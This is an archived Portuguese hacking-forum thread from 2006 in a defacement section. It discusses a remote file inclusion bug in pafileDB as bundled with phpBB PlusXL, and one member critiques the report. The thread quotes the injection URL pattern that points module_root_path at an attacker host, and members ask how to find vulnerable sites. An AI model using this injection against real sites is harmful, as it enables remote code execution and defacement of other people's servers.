Text only | Text with Images

FORUM DARKERS

Segurança & Hacking => Defacement => Topic started by: Anonymous on 09 de May , 2006, 05:42:24 PM

Title: Novo Bug de Remote File Inclusion(php injection) Descoberto por Darkfire
Post by: Anonymous on 09 de May , 2006, 05:42:24 PM
aew pessoal do darkers nos links abaixos vocês poderam vem o bug descoberto por eu, darkfire, aproveitem qe foi postado ontém no zone-h e hoje no milw0rm.... Nu tem muito sim bugado naum

http://www.zone-h.com/en/advisories/read/id=8986/ (http://www.zone-h.com/en/advisories/read/id=8986/)

e

http://www.milw0rm.com/exploits/1774 (http://www.milw0rm.com/exploits/1774)

by Darkfire <> Ir4dex Group <>
Title: Re: Novo Bug de Remote File Inclusion(php injection) Descoberto por Darkfire
Post by: rog on 09 de May , 2006, 06:33:34 PM
isso ta meio confuso

1) Version : not specified
isso nao tem logica pelo menos a versao invadida

2) http://www.site.com/ (http://www.site.com/)[phpBBpath]/[pafiledbpath]/includes/pafiledb_constants.php?module_root_path=http://[attacker]
o que tem a ver [phpBBpath] com isso ?

3) isso so vai funfar com o register globals passado a on (muito rare)

4) $link_language = 'lang_english';
nao vejo vulnerabilidade nisso

5) include( $module_root_path . 'language/' . $link_language . '/lang_pafiledb.' . $phpEx );
o todas as paginas que usam esse include sao vulneraveis com o register globals passado a on

qualquer_pagina.php?module_root_path=http://[attacker] ?inutil=

vai passar a ser

include( http://[attacker] ?inutil=language/$link_language/lang_pafiledb$phpEx );

nem vou commentar mais

rog
Title: Re: Novo Bug de Remote File Inclusion(php injection) Descoberto por Darkfire
Post by: Anonymous on 09 de May , 2006, 09:14:49 PM
primeira coisa
Version: not spefied(sei lah comu escreve nu fui eu qe passei pro inglês)
pq naum tem versão especifica

segundo fiote naum estou afim de saber seus conhecimentos de php pq eu nem sei php direito soh sei descubri bug .(soh sei du fuçometro)

ah se vc perceber eh [phpbbpath] eh pq eh um script incluson nu phpBB o pafileDB
se vc tivesse olhado uh baguiu direito vc naum fazeria essa pergunta idiota

eu tirei uma parte do codigo onde tah uh bug! ih naum a parte soh barte bugada

ih se naum gosto du qe eu faleí problema eh seu pelo menos os gringos gostaram tudo foram até nu canal du meu crew agradecer.

bye...bye...
Title: Re: Novo Bug de Remote File Inclusion(php injection) Descoberto por Darkfire
Post by: Anonymous on 15 de May , 2006, 04:31:26 AM
ahh
entaum eh um bug no pafiledb q eh usado no phpbb??

pq o pafiledb pode ser usado sem o phpbb
q aliás
eu nunca vi ele no phpbb oO
Title: Re: Novo Bug de Remote File Inclusion(php injection) Descoberto por Darkfire
Post by: rog on 15 de May , 2006, 09:26:25 AM
o problema com essa falha mal documentada e que o pafiledb e um script antigo que evoluiu muito

entao como nao se sabe qual e a versao vulneravel, teria que baixar o codigo fonte das versao para qual dela contem a falha

rog
Title: Re: Novo Bug de Remote File Inclusion(php injection) Descoberto por Darkfire
Post by: bloodrain on 15 de May , 2006, 09:33:57 AM
[pafiledbpath]
que diretorio seria esse?
como saber se o site esta vulneravel?
como descobrir sites vul?

hehehe  varias perguntas
hehehe uma das primeiras vezeses que eu concordo com o rog
Title: Re: Novo Bug de Remote File Inclusion(php injection) Descoberto por Darkfire
Post by: Anonymous on 15 de May , 2006, 02:43:41 PM
vamo um de cada vez

uh bug eh nu phpBB PlusXL onde vem incluso o pafileDB

Teve um que pergunto como pesquisa no google:
meu caro aí eh com vc, eu nu posso falar tudo se naum fica facil d+

pra pergunta como descobrir se ele está vuln:
soh injetando ah string fiote

pafiledbpath seria uh diretorio do pafiledb qe normalmente é /pafiledb/

ah ih pro comentario do Sr. Rog:
se eu dah uh negociu completo eu naum estarei encetivando o pessoal as pesquisar e nem a perguntar.

por isso qe os defacers taum em decadencia
Text only | Text with Images